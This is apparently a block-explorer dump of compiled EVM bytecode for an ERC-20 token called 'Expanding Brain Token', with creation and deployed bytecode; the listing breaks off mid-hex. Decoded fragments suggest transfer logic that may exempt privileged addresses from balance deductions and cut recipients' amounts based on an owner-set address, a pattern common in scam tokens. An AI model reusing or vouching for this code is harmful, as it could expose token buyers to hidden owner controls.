00a81548160ff021916908315150217905550600160056000600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550600160056000600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550620005956200060660201b60201c565b73ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef600654604051620005f691906200072c565b60405180910390a3505062000749565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600062000669826200063c565b9050919050565b6200067b816200065c565b81146200068757600080fd5b50565b6000815190506200069b8162000670565b92915050565b600060208284031215620006ba57620006b962000637565b5b6000620006ca848285016200068a565b91505092915050565b620006de816200065c565b82525050565b6000604082019050620006fb6000830185620006d3565b6200070a6020830184620006d3565b9392505050565b6000819050919050565b620007268162000711565b82525050565b60006020820190506200074360008301846200071b565b92915050565b61258480620007596000396000f3fe60806040526004361061014f5760003560e01c80636bc87c3a116100b6578063962dfc751161006f578063962dfc75146104a5578063a457c2d7146104d0578063a9059cbb1461050d578063dd62ed3e1461054a578063ea2f0b3714610587578063f2fde38b146105b057610156565b80636bc87c3a146103a557806370a08231146103d0578063715018a61461040d5780637d1db4a5146104245780638da5cb5b1461044f57806395d89b411461047a57610156565b806323b872dd1161010857806323b872dd1461026f578063313ce567146102ac57806339509351146102d7578063437823ec1461031457806349bd5a5e1461033d5780635342acb41461036857610156565b806303fd2a451461015b57806306fdde0314610186578063095ea7b3146101b15780631694505e146101ee57806318160ddd1461021957806322976e0d1461024457610156565b3661015657005b600080fd5b34801561016757600080fd5b506101706105d9565b60405161017d9190611b97565b60405180910390f35b34801561019257600080fd5b5061019b6105ff565b6040516101a89190611c42565b60405180910390f35b3480156101bd57600080fd5b506101d860048036038101906101d39190611ccb565b61063c565b6040516101e59190611d26565b60405180910390f35b3480156101fa57600080fd5b5061020361065a565b6040516102109190611da0565b60405180910390f35b34801561022557600080fd5b5061022e610680565b60405161023b9190611dca565b60405180910390f35b34801561025057600080fd5b5061025961068a565b6040516102669190611dca565b60405180910390f35b34801561027b57600080fd5b5061029660048036038101906102919190611de5565b610690565b6040516102a39190611d26565b60405180910390f35b3480156102b857600080fd5b506102c1610748565b6040516102ce9190611e54565b60405180910390f35b3480156102e357600080fd5b506102fe60048036038101906102f99190611ccb565b610751565b60405161030b9190611d26565b60405180910390f35b34801561032057600080fd5b5061033b60048036038101906103369190611e6f565b6107fd565b005b34801561034957600080fd5b506103526108ed565b60405161035f9190611b97565b60405180910390f35b34801561037457600080fd5b5061038f600480360381019061038a9190611e6f565b610913565b60405161039c9190611d26565b60405180910390f35b3480156103b157600080fd5b506103ba610969565b6040516103c79190611dca565b60405180910390f35b3480156103dc57600080fd5b506103f760048036038101906103f29190611e6f565b61096f565b6040516104049190611dca565b60405180910390f35b34801561041957600080fd5b506104226109b8565b005b34801561043057600080fd5b50610439610b0b565b6040516104469190611dca565b60405180910390f35b34801561045b57600080fd5b50610464610b11565b6040516104719190611b97565b60405180910390f35b34801561048657600080fd5b5061048f610b3a565b60405161049c9190611c42565b60405180910390f35b3480156104b157600080fd5b506104ba610b77565b6040516104c79190611b97565b60405180910390f35b3480156104dc57600080fd5b506104f760048036038101906104f29190611ccb565b610b9d565b6040516105049190611d26565b60405180910390f35b34801561051957600080fd5b50610534600480360381019061052f9190611ccb565b610c49565b6040516105419190611d26565b60405180910390f35b34801561055657600080fd5b50610571600480360381019061056c9190611e9c565b610c67565b60405161057e9190611dca565b60405180910390f35b34801561059357600080fd5b506105ae60048036038101906105a99190611e6f565b610cee565b005b3480156105bc57600080fd5b506105d760048036038101906105d29190611e6f565b610dde565b005b600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60606040518060400160405280601581526020017f457870616e64696e6720427261696e20546f6b656e0000000000000000000000815250905090565b6000610650610649610f9f565b8484610fa7565b6001905092915050565b600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600654905090565b60085481565b600061069d848484611170565b61073d846106a9610f9f565b84600460008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006106f3610f9f565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546107389190611f0b565b610fa7565b600190509392505050565b60006009905090565b60006107f361075e610f9f565b84846004600061076c610f9f565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546107ee9190611f3f565b610fa7565b6001905092915050565b610805610f9f565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610892576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161088990611fbf565b60405180910390fd5b6001600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60095481565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6109c0610f9f565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610a4d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a4490611fbf565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a360008060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b60075481565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606040518060400160405280600881526020017f455850425241494e000000000000000000000000000000000000000000000000815250905090565b600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000610c3f610baa610f9f565b848460046000610bb8610f9f565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610c3a9190611f0b565b610fa7565b6001905092915050565b6000610c5d610c56610f9f565b8484611170565b6001905092915050565b6000600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610cf6610f9f565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610d83576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d7a90611fbf565b60405180910390fd5b6000600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b610de6610f9f565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610e73576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e6a90611fbf565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610ee2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ed990612051565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611016576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161100d906120e3565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611085576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161107c90612175565b60405180910390fd5b80600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516111639190611dca565b60405180910390a3505050565b600081116111b3576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111aa90612207565b60405180910390fd5b600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161580156112575750600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b80156112b15750600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b1561130f57600754816112c38461096f565b6112cd9190611f3f565b111561130e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161130590612299565b60405180910390fd5b5b6404a817c80061131e3061096f565b101580156113395750600d60009054906101000a900460ff16155b80156113935750600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b156113e6576001600d60006101000a81548160ff02191690831515021790555060006113be3061096f565b90506113c981611661565b6000600d60006101000a81548160ff021916908315150217905550505b6113f082846116e5565b1561144a576001436114029190611f0b565b600c60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506114e5565b43600c60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555080600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546114dd9190611f0b565b925050819055505b6000819050600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615801561158e5750600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b156115a05761159d8285611798565b90505b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546115ef9190611f3f565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516116539190611dca565b60405180910390a350505050565b600061166c826118fc565b905060008111156116e157600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166108fc829081150290604051600060405180830381858888f193505050501580156116df573d6000803e3d6000fd5b505b5050565b600080600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16159050808061178e5750600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b1591505092915050565b6000806064600854856117ab91906122b9565b6117b5919061232a565b905060006064600954866117c991906122b9565b6117d3919061232a565b905080826117e19190611f3f565b600360003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461182f9190611f3f565b925050819055503073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83856118919190611f3f565b60405161189e9190611dca565b60405180910390a36118d1600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1661096f565b8183876118de9190611f0b565b6118e89190611f0b565b6118f29190611f0b565b9250505092915050565b6000804790506000600267ffffffffffffffff81111561191f5761191e61235b565b5b60405190808252806020026020018201604052801561194d5781602001602082028036833780820191505090505b50905030816000815181106119655761196461238a565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015611a0c573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611a3091906123ce565b81600181518110611a4457611a4361238a565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050611aab30600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1686610fa7565b600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663791ac9478560008430426040518663ffffffff1660e01b8152600401611b0f9594939291906124f4565b600060405180830381600087803b158015611b2957600080fd5b505af1158015611b3d573d6000803e3d6000fd5b505050508147611b4d9190611f0b565b92505050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000611b8182611b56565b9050919050565b611b9181611b76565b82525050565b6000602082019050611bac6000830184611b88565b92915050565b600081519050919050565b600082825260208201905092915050565b60005b83811015611bec578082015181840152602081019050611bd1565b60008484015250505050565b6000601f19601f8301169050919050565b6000611c1482611bb2565b611c1e8185611bbd565b9350611c2e818560208601611bce565b611c3781611bf8565b840191505092915050565b60006020820190508181036000830152611c5c8184611c09565b905092915050565b600080fd5b611c7281611b76565b8114611c7d57600080fd5b50565b600081359050611c8f81611c69565b92915050565b6000819050919050565b611ca881611c95565b8114611cb357600080fd5b50565b600081359050611cc581611c9f565b92915050565b60008060408385031215611ce257611ce1611c64565b5b6000611cf085828601611c80565b9250506020611d0185828601611cb6565b9150509250929050565b60008115159050919050565b611d2081611d0b565b82525050565b6000602082019050611d3b6000830184611d17565b92915050565b6000819050919050565b6000611d66611d61611d5c84611b56565b611d41565b611b56565b9050919050565b6000611d7882611d4b565b9050919050565b6000611d8a82611d6d565b9050919050565b611d9a81611d7f565b82525050565b6000602082019050611db56000830184611d91565b92915050565b611dc481611c95565b82525050565b6000602082019050611ddf6000830184611dbb565b92915050565b600080600060608486031215611dfe57611dfd611c64565b5b6000611e0c86828701611c80565b9350506020611e1d86828701611c80565b9250506040611e2e86828701611cb6565b9150509250925092565b600060ff82169050919050565b611e4e81611e38565b82525050565b6000602082019050611e696000830184611e45565b92915050565b600060208284031215611e8557611e84611c64565b5b6000611e9384828501611c80565b91505092915050565b60008060408385031215611eb357611eb2611c64565b5b6000611ec185828601611c80565b9250506020611ed285828601611c80565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000611f1682611c95565b9150611f2183611c95565b9250828203905081811115611f3957611f38611edc565b5b92915050565b6000611f4a82611c95565b9150611f5583611c95565b9250828201905080821115611f6d57611f6c611edc565b5b92915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611fa9602083611bbd565b9150611fb482611f73565b602082019050919050565b60006020820190508181036000830152611fd881611f9c565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b600061203b602683611bbd565b915061204682611fdf565b604082019050919050565b6000602082019050818103600083015261206a8161202e565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006120cd602483611bbd565b91506120d882612071565b604082019050919050565b600060208201905081810360008301526120fc816120c0565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b600061215f602283611bbd565b915061216a82612103565b604082019050919050565b6000602082019050818103600083015261218e81612152565b9050919050565b7f5472616e7366657220616d6f756e74206d75737420626520677265617465722060008201527f7468616e207a65726f0000000000000000000000000000000000000000000000602082015250565b60006121f1602983611bbd565b91506121fc82612195565b604082019050919050565b60006020820190508181036000830152612220816121e4565b9050919050565b7f5472616e7366657220616d6f756e74206578636565647320746865206d61785460008201527f78416d6f756e742e000000000000000000000000000000000000000000000000602082015250565b6000612283602883611bbd565b915061228e82612227565b604082019050919050565b600060208201905081810360008301526122b281612276565b9050919050565b60006122c482611c95565b91506122cf83611c95565b92508282026122dd81611c95565b915082820484148315176122f4576122f3611edc565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b600061233582611c95565b915061234083611c95565b9250826123505761234f6122fb565b5b828204905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b6000815190506123c881611c69565b92915050565b6000602082840312156123e4576123e3611c64565b5b60006123f2848285016123b9565b91505092915050565b6000819050919050565b600061242061241b612416846123fb565b611d41565b611c95565b9050919050565b61243081612405565b82525050565b600081519050919050565b600082825260208201905092915050565b6000819050602082019050919050565b61246b81611b76565b82525050565b600061247d8383612462565b60208301905092915050565b6000602082019050919050565b60006124a182612436565b6124ab8185612441565b93506124b683612452565b8060005b838110156124e75781516124ce8882612471565b97506124d983612489565b9250506001810190506124ba565b5085935050505092915050565b600060a0820190506125096000830188611dbb565b6125166020830187612427565b81810360408301526125288186612496565b90506125376060830185611b88565b6125446080830184611dbb565b969550505050505056fea26469706673582212200d0bfb6b110806fba8d1fb9b96b129d3de45a8edd075cd0378b364c651b4201a64736f6c63430008110033
Deployed Bytecode
0x60806040526004361061014f5760003560e01c80636bc87c3a116100b6578063962dfc751161006f578063962dfc75146104a5578063a457c2d7146104d0578063a9059cbb1461050d578063dd62ed3e1461054a578063ea2f0b3714610587578063f2fde38b146105b057610156565b80636bc87c3a146103a557806370a08231146103d0578063715018a61461040d5780637d1db4a5146104245780638da5cb5b1461044f57806395d89b411461047a57610156565b806323b872dd1161010857806323b872dd1461026f578063313ce567146102ac57806339509351146102d7578063437823ec1461031457806349bd5a5e1461033d5780635342acb41461036857610156565b806303fd2a451461015b57806306fdde0314610186578063095ea7b3146101b15780631694505e146101ee57806318160ddd1461021957806322976e0d1461024457610156565b3661015657005b600080fd5b34801561016757600080fd5b506101706105d9565b60405161017d9190611b97565b60405180910390f35b34801561019257600080fd5b5061019b6105ff565b6040516101a89190611c42565b60405180910390f35b3480156101bd57600080fd5b506101d860048036038101906101d39190611ccb565b61063c565b6040516101e59190611d26565b60405180910390f35b3480156101fa57600080fd5b5061020361065a565b6040516102109190611da0565b60405180910390f35b34801561022557600080fd5b5061022e610680565b60405161023b9190611dca565b60405180910390f35b34801561025057600080fd5b5061025961068a565b6040516102669190611dca565b60405180910390f35b34801561027b57600080fd5b5061029660048036038101906102919190611de5565b610690565b6040516102a39190611d26565b60405180910390f35b3480156102b857600080fd5b506102c1610748565b6040516102ce9190611e54565b60405180910390f35b3480156102e357600080fd5b506102fe60048036038101906102f99190611ccb565b610751565b60405161030b9190611d26565b60405180910390f35b34801561032057600080fd5b5061033b60048036038101906103369190611e6f565b6107fd565b005b34801561034957600080fd5b506103526108ed565b60405161035f9190611b97565b60405180910390f35b34801561037457600080fd5b5061038f600480360381019061038a9190611e6f565b610913565b60405161039c9190611d26565b60405180910390f35b3480156103b157600080fd5b506103ba610969565b6040516103c79190611dca565b60405180910390f35b3480156103dc57600080fd5b506103f760048036038101906103f29190611e6f565b61096f565b6040516104049190611dca565b60405180910390f35b34801561041957600080fd5b506104226109b8565b005b34801561043057600080fd5b50610439610b0b565b6040516104469190611dca565b60405180910390f35b34801561045b57600080fd5b50610464610b11565b6040516104719190611b97565b60405180910390f35b34801561048657600080fd5b5061048f610b3a565b60405161049c9190611c42565b60405180910390f35b3480156104b157600080fd5b506104ba610b77565b6040516104c79190611b97565b60405180910390f35b3480156104dc57600080fd5b506104f760048036038101906104f29190611ccb565b610b9d565b6040516105049190611d26565b60405180910390f35b34801561051957600080fd5b50610534600480360381019061052f9190611ccb565b610c49565b6040516105419190611d26565b60405180910390f35b34801561055657600080fd5b50610571600480360381019061056c9190611e9c565b610c67565b60405161057e9190611dca565b60405180910390f35b34801561059357600080fd5b506105ae60048036038101906105a99190611e6f565b610cee565b005b3480156105bc57600080fd5b506105d760048036038101906105d29190611e6f565b610dde565b005b600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60606040518060400160405280601581526020017f457870616e64696e6720427261696e20546f6b656e0000000000000000000000815250905090565b6000610650610649610f9f565b8484610fa7565b6001905092915050565b600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600654905090565b60085481565b600061069d848484611170565b61073d846106a9610f9f565b84600460008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006106f3610f9f565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546107389190611f0b565b610fa7565b600190509392505050565b60006009905090565b60006107f361075e610f9f565b84846004600061076c610f9f565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546107ee9190611f3f565b610fa7565b6001905092915050565b610805610f9f565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610892576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161088990611fbf565b60405180910390fd5b6001600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60095481565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6109c0610f9f565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610a4d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a4490611fbf565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a360008060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b60075481565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606040518060400160405280600881526020017f455850425241494e000000000000000000000000000000000000000000000000815250905090565b600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000610c3f610baa610f9f565b848460046000610bb8610f9f565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610c3a9190611f0b565b610fa7565b6001905092915050565b6000610c5d610c56610f9f565b8484611170565b6001905092915050565b6000600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610cf6610f9f565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610d83576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d7a90611fbf565b60405180910390fd5b6000600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b610de6610f9f565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610e73576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e6a90611fbf565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610ee2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ed990612051565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611016576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161100d906120e3565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611085576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161107c90612175565b60405180910390fd5b80600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516111639190611dca565b60405180910390a3505050565b600081116111b3576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111aa90612207565b60405180910390fd5b600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161580156112575750600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b80156112b15750600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b1561130f57600754816112c38461096f565b6112cd9190611f3f565b111561130e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161130590612299565b60405180910390fd5b5b6404a817c80061131e3061096f565b101580156113395750600d60009054906101000a900460ff16155b80156113935750600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b156113e6576001600d60006101000a81548160ff02191690831515021790555060006113be3061096f565b90506113c981611661565b6000600d60006101000a81548160ff021916908315150217905550505b6113f082846116e5565b1561144a576001436114029190611f0b565b600c60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506114e5565b43600c60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555080600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546114dd9190611f0b565b925050819055505b6000819050600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615801561158e5750600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b156115a05761159d8285611798565b90505b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546115ef9190611f3f565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516116539190611dca565b60405180910390a350505050565b600061166c826118fc565b905060008111156116e157600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166108fc829081150290604051600060405180830381858888f193505050501580156116df573d6000803e3d6000fd5b505b5050565b600080600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16159050808061178e5750600560008473ffffffffffffffffffffffffffffffffffffffff1673fffffffffffffffffffffffffffffffffffff